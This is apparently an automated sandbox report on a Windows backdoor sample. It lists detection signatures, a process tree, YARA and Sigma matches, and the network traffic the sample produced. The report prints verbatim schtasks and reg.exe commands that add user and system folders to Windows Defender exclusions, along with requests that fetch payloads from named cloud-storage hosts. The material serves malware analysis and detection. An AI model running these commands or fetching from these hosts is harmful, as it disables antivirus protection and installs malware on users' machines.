Edit tour

Windows Analysis Report
13478674376-78423498.01.exe

Overview

General Information

Sample name:	13478674376-78423498.01.exe
Analysis ID:	1589731
MD5:	cb04cda738077ea40a31ea0ecfdedd43
SHA1:	605d7039c1d2f2e0c67efec779c846bf854406dd
SHA256:	a63bccb88466f212600f0b97e8fffb2bf49ceb76ee173fb6e1cac35d8dbe94f1
Tags:	backdoorexesilverfoxwinosuser-zhuzhu0009
Infos:

Detection

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

AI detected suspicious sample

Adds extensions / path to Windows Defender exclusion list (Registry)

Drops PE files to the document folder of the user

Found direct / indirect Syscall (likely to bypass EDR)

Overwrites code with unconditional jumps - possibly settings hooks in foreign process

Sample is not signed and drops a device driver

Sigma detected: Invoke-Obfuscation CLIP+ Launcher

Sigma detected: Invoke-Obfuscation VAR+ Launcher

Tries to detect virtualization through RDTSC time measurements

Uses cmd line tools excessively to alter registry or file data

Uses schtasks.exe or at.exe to add and modify task schedules

AV process strings found (often used to terminate AV products)

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to delete services

Contains functionality to dynamically determine API calls

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Creates driver files

Creates files inside the driver directory

Creates files inside the system directory

Detected potential crypto function

Drops PE files

Drops PE files to the windows directory (C:\Windows)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found evasive API chain (may stop execution after checking a module file name)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Suspicious Windows Defender Folder Exclusion Added Via Reg.EXE

Sigma detected: Windows Defender Exclusions Added - Registry

Uses code obfuscation techniques (call, push, ret)

Uses reg.exe to modify the Windows registry

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara signature match

Classification

Process Tree

System is w10x64

13478674376-78423498.01.exe (PID: 3548 cmdline: "C:\Users\user\Desktop\13478674376-78423498.01.exe" MD5: CB04CDA738077EA40A31EA0ECFDEDD43)

4mPVjj.exe (PID: 4328 cmdline: C:\Users\user\Documents\4mPVjj.exe MD5: D3709B25AFD8AC9B63CBD4E1E1D962B9)

4mPVjj.exe (PID: 1524 cmdline: C:\Users\user\Documents\4mPVjj.exe MD5: D3709B25AFD8AC9B63CBD4E1E1D962B9)

cmd.exe (PID: 2276 cmdline: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 1280 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 4904 cmdline: SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 5876 cmdline: SCHTASKS /Run /TN "Task1" MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 3424 cmdline: SCHTASKS /Delete /TN "Task1" /F MD5: 76CD6626DD8834BD4A42E6A565104DC2)

cmd.exe (PID: 828 cmdline: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 4828 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 4416 cmdline: SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 3060 cmdline: SCHTASKS /Run /TN "Task1" MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 6900 cmdline: SCHTASKS /Delete /TN "Task1" /F MD5: 76CD6626DD8834BD4A42E6A565104DC2)

cmd.exe (PID: 3776 cmdline: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7140 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 2060 cmdline: SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 4872 cmdline: SCHTASKS /Run /TN "Task1" MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 6752 cmdline: SCHTASKS /Delete /TN "Task1" /F MD5: 76CD6626DD8834BD4A42E6A565104DC2)

cmd.exe (PID: 5560 cmdline: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"%USERPROFILE%\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 4424 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 1512 cmdline: SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\user\Documents\" /t REG_DWORD /d 0 /f" MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 3740 cmdline: SCHTASKS /Run /TN "Task1" MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 3208 cmdline: SCHTASKS /Delete /TN "Task1" /F MD5: 76CD6626DD8834BD4A42E6A565104DC2)

cmd.exe (PID: 6012 cmdline: cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 5464 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

reg.exe (PID: 5676 cmdline: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)

cmd.exe (PID: 6272 cmdline: cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 3524 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

reg.exe (PID: 4200 cmdline: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)

cmd.exe (PID: 3316 cmdline: cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 2220 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

reg.exe (PID: 2384 cmdline: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)

cmd.exe (PID: 2324 cmdline: cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 3868 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

reg.exe (PID: 2100 cmdline: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)

cleanup

Yara Signatures

Unpacked PEs

Source	Rule	Description	Author	Strings
5.2.4mPVjj.exe.27e0000.1.unpack	INDICATOR_SUSPICIOUS_DisableWinDefender	Detects executables containing artifcats associated with disabling Widnows Defender	ditekSHen	0x1fb0f:$e1: Microsoft\Windows Defender\Exclusions\Paths 0x1fbc2:$e1: Microsoft\Windows Defender\Exclusions\Paths 0x1fcd2:$e1: Microsoft\Windows Defender\Exclusions\Paths 0x1fc20:$e2: Add-MpPreference -ExclusionPath
6.2.4mPVjj.exe.2830000.1.unpack	INDICATOR_SUSPICIOUS_DisableWinDefender	Detects executables containing artifcats associated with disabling Widnows Defender	ditekSHen	0x1fb0f:$e1: Microsoft\Windows Defender\Exclusions\Paths 0x1fbc2:$e1: Microsoft\Windows Defender\Exclusions\Paths 0x1fcd2:$e1: Microsoft\Windows Defender\Exclusions\Paths 0x1fc20:$e2: Add-MpPreference -ExclusionPath

Sigma Signatures

System Summary

Sigma detected: Invoke-Obfuscation CLIP+ Launcher

Source: Process started

Author: Jonathan Cheong, oscd.community: Data: Command: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F, CommandLine: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Users\user\Documents\4mPVjj.exe, ParentImage: C:\Users\user\Documents\4mPVjj.exe, ParentProcessId: 1524, ParentProcessName: 4mPVjj.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F, ProcessId: 2276, ProcessName: cmd.exe

Sigma detected: Invoke-Obfuscation VAR+ Launcher

Source: Process started

Sigma detected: Suspicious Windows Defender Folder Exclusion Added Via Reg.EXE

Source: Process started

Author: frack113: Data: Command: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f, CommandLine: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f, CommandLine|base64offset|contains: , Image: C:\Windows\System32\reg.exe, NewProcessName: C:\Windows\System32\reg.exe, OriginalFileName: C:\Windows\System32\reg.exe, ParentCommandLine: cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 6012, ParentProcessName: cmd.exe, ProcessCommandLine: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f, ProcessId: 5676, ProcessName: reg.exe

Sigma detected: Windows Defender Exclusions Added - Registry

Source: Registry Key set

Author: Christian Burkard (Nextron Systems): Data: Details: 0, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\reg.exe, ProcessId: 5676, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: 13478674376-78423498.01.exe

Virustotal: Detection: 12%

Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Source: unknown	HTTPS traffic detected: 47.101.28.195:443 -> 192.168.2.6:49985 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 118.178.60.9:443 -> 192.168.2.6:49993 version: TLS 1.2

Source:	Binary string: d3dx9_43.pdb source: 13478674376-78423498.01.exe
Source:	Binary string: BootstrapPackagedGame-Win64-Shipping.pdb source: 13478674376-78423498.01.exe
Source:	Binary string: d:\work\iGiveButton\toolbar4\Release_bin\uninstall.pdb source: 4mPVjj.exe, 00000006.00000002.3377868720.0000000003CE2000.00000004.00000020.00020000.00000000.sdmp, 4mPVjj.exe, 00000006.00000002.3377868720.0000000003D27000.00000004.00000020.00020000.00000000.sdmp, FLgX3z.exe.6.dr
Source:	Binary string: c:\tools_git_priv\truesight\driver\objfre_win7_amd64\amd64\TrueSight.pdb source: 189atohci.sys.0.dr
Source:	Binary string: y:\avsdk5\user\make\build\public\64-bit\vseamps.pdb source: 13478674376-78423498.01.exe, 00000000.00000003.3022250024.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3022226110.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3022312736.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3022335608.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3023643855.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3023154464.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3022096135.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 4mPVjj.exe, 00000005.00000000.3165690045.0000000140014000.00000002.00000001.01000000.00000008.sdmp, 4mPVjj.exe, 00000005.00000002.3177550377.0000000140014000.00000002.00000001.01000000.00000008.sdmp, 4mPVjj.exe, 00000006.00000000.3185438995.0000000140014000.00000002.00000001.01000000.00000008.sdmp, 4mPVjj.exe, 00000006.00000002.3378035799.0000000140014000.00000002.00000001.01000000.00000008.sdmp, 4mPVjj.exe.0.dr

Change of critical system settings

Adds extensions / path to Windows Defender exclusion list (Registry)

Source: C:\Windows\System32\reg.exe	Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\ProgramData	Jump to behavior
Source: C:\Windows\System32\reg.exe	Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Users	Jump to behavior
Source: C:\Windows\System32\reg.exe	Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Program Files (x86)	Jump to behavior
Source: C:\Windows\System32\reg.exe	Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Users\user\Documents	Jump to behavior

Source: C:\Users\user\Documents\4mPVjj.exe

Code function: 5_2_00007FFDAC12A1B8 FindFirstFileExW,

5_2_00007FFDAC12A1B8

Source: C:\Users\user\Documents\4mPVjj.exe	Code function: 4x nop then mov rax, qword ptr [rsp+78h]	5_2_000000014000DFFE
Source: C:\Users\user\Documents\4mPVjj.exe	Code function: 4x nop then mov rax, qword ptr [rsp+78h]	5_2_000000014000DDFF
Source: C:\Users\user\Documents\4mPVjj.exe	Code function: 4x nop then movsxd rbx, qword ptr [r14+10h]	5_2_0000000140011270
Source: C:\Users\user\Documents\4mPVjj.exe	Code function: 4x nop then mov rax, qword ptr [rsp+78h]	5_2_000000014000DE96
Source: C:\Users\user\Documents\4mPVjj.exe	Code function: 4x nop then mov rax, qword ptr [rsp+78h]	5_2_000000014000DEFB
Source: C:\Users\user\Documents\4mPVjj.exe	Code function: 4x nop then mov rax, qword ptr [rsp+78h]	5_2_000000014000E178
Source: C:\Users\user\Documents\4mPVjj.exe	Code function: 4x nop then mov rax, qword ptr [rsp+78h]	5_2_000000014000DDD9

Source: Joe Sandbox View

IP Address: 118.178.60.9 118.178.60.9

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Documents\4mPVjj.exe

Code function: 6_2_00600475 InternetReadFile,

6_2_00600475

Source: global traffic	HTTP traffic detected: GET /i.dat HTTP/1.1User-Agent: 3MHost: hdsuer.oss-cn-shanghai.aliyuncs.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /a.gif HTTP/1.1User-Agent: 3MHost: hdsuer.oss-cn-shanghai.aliyuncs.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /b.gif HTTP/1.1User-Agent: 3MHost: hdsuer.oss-cn-shanghai.aliyuncs.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /c.gif HTTP/1.1User-Agent: 3MHost: hdsuer.oss-cn-shanghai.aliyuncs.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /d.gif HTTP/1.1User-Agent: 3MHost: hdsuer.oss-cn-shanghai.aliyuncs.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /s.dat HTTP/1.1User-Agent: 3MHost: hdsuer.oss-cn-shanghai.aliyuncs.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /s.jpg HTTP/1.1User-Agent: 3MHost: hdsuer.oss-cn-shanghai.aliyuncs.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /drops.jpg HTTP/1.1User-Agent: GetDataHost: 22mm.oss-cn-hangzhou.aliyuncs.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /f.dat HTTP/1.1User-Agent: GetDataHost: 22mm.oss-cn-hangzhou.aliyuncs.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /FOM-50.jpg HTTP/1.1User-Agent: GetDataHost: 22mm.oss-cn-hangzhou.aliyuncs.comCache-Control: no-cache

Source: 13478674376-78423498.01.exe

String found in binary or memory: <</Subtype/Link/Rect[ 69.75 156.07 291.64 177.94] /BS<</W 0>>/F 4/A<</Type/Action/S/URI/URI(http://www.youtube.com/watch?v=1r2C1zGUHbU) >>/StructParent 21>> equals www.youtube.com (Youtube)

Source: global traffic	DNS traffic detected: DNS query: hdsuer.oss-cn-shanghai.aliyuncs.com
Source: global traffic	DNS traffic detected: DNS query: 22mm.oss-cn-hangzhou.aliyuncs.com

Source: 13478674376-78423498.01.exe	String found in binary or memory: http://apex-reps.com/assets/site/uploads/cIoZUYBLIG.pdf)
Source: 189atohci.sys.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceCodeSigningCA-1.crt0
Source: 189atohci.sys.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
Source: 13478674376-78423498.01.exe	String found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
Source: 13478674376-78423498.01.exe	String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: 13478674376-78423498.01.exe, 00000000.00000003.3022250024.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3022226110.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3022312736.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3022335608.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3023643855.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3023154464.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3022096135.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 189atohci.sys.0.dr, 4mPVjj.exe.0.dr	String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: 189atohci.sys.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: 189atohci.sys.0.dr	String found in binary or memory: http://crl3.digicert.com/ha-cs-2011a.crl0.
Source: 189atohci.sys.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: 189atohci.sys.0.dr	String found in binary or memory: http://crl4.digicert.com/ha-cs-2011a.crl0L
Source: 13478674376-78423498.01.exe	String found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
Source: 13478674376-78423498.01.exe	String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: 13478674376-78423498.01.exe	String found in binary or memory: http://education.ohio.gov/Topics/Student-Supports)
Source: 13478674376-78423498.01.exe	String found in binary or memory: http://education.ohio.gov/getattachment/Topics/Ohio-s-Graduation-Requirements/News/Two-additional-gr
Source: 13478674376-78423498.01.exe	String found in binary or memory: http://education.ohio.gov/getattachment/Topics/Student-Supports/Coronavirus/Child-Nutrition-%E2%80%9
Source: 189atohci.sys.0.dr	String found in binary or memory: http://ocsp.digicert.com0I
Source: 189atohci.sys.0.dr	String found in binary or memory: http://ocsp.digicert.com0P
Source: 13478674376-78423498.01.exe	String found in binary or memory: http://ocsp.sectigo.com0
Source: 13478674376-78423498.01.exe, 00000000.00000003.3022250024.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3022226110.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3022312736.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3022335608.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3023643855.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3023154464.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3022096135.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 189atohci.sys.0.dr, 4mPVjj.exe.0.dr	String found in binary or memory: http://ocsp.thawte.com0
Source: 13478674376-78423498.01.exe, 00000000.00000003.3022250024.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3022226110.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3022312736.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3022335608.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3023643855.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3023154464.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3022096135.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 4mPVjj.exe.0.dr	String found in binary or memory: http://s.symcb.com/pca3-g5.crl0
Source: 13478674376-78423498.01.exe, 00000000.00000003.3022250024.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3022226110.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3022312736.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3022335608.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3023643855.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3023154464.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3022096135.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 4mPVjj.exe.0.dr	String found in binary or memory: http://s.symcb.com/universal-root.crl0
Source: 13478674376-78423498.01.exe, 00000000.00000003.3022250024.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3022226110.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3022312736.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3022335608.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3023643855.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3023154464.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3022096135.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 4mPVjj.exe.0.dr	String found in binary or memory: http://s.symcd.com06
Source: 13478674376-78423498.01.exe, 00000000.00000003.3022250024.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3022226110.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3022312736.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3022335608.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3023643855.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3023154464.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 13478674376-78423498.01.exe, 00000000.00000003.3022096135.000000000A6A1000.00000004.00000020.00020000.00000000.sdmp, 4mPVjj.exe.0.dr	String found in binary or memory: http://s.symcd.com0_
